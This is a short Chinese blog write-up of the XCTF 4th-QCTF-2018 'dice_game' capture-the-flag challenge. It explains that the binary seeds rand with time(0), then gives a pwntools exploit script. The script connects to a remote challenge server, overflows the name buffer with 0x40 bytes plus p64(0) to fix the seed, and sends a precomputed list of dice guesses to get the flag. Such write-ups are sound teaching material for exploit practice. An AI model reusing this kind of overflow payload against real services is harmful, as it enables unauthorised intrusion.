欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

dice_game XCTF 4th-QCTF-2018

程序员文章站 2024-01-20 08:32:04
...

其实感觉这个题 不算是pwn题。。。 

dice_game XCTF 4th-QCTF-2018

这 pwn 里面就是 读取flag 文件 然后我们看一下 sub_a20 这个函数

 

dice_game XCTF 4th-QCTF-2018

随机数啊   本来我没有想用 把种子给 覆盖掉  但是   time(0) 感觉不稳   时间一万一不对劲 那么随机数 也会出错  

所以干脆 把种子固定下来 

下面是 exp

#coding:utf-8

from pwn import*
lists=[2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]

#io=process("./pwn")
io=remote('111.198.29.45',53973)
io.recvuntil("name: ")
io.sendline("a" * 0x40 + p64(0))

for i in lists:
	io.recvuntil("Give me the point(1~6): ")
	io.sendline(str(i))

print io.recv()
io.interactive()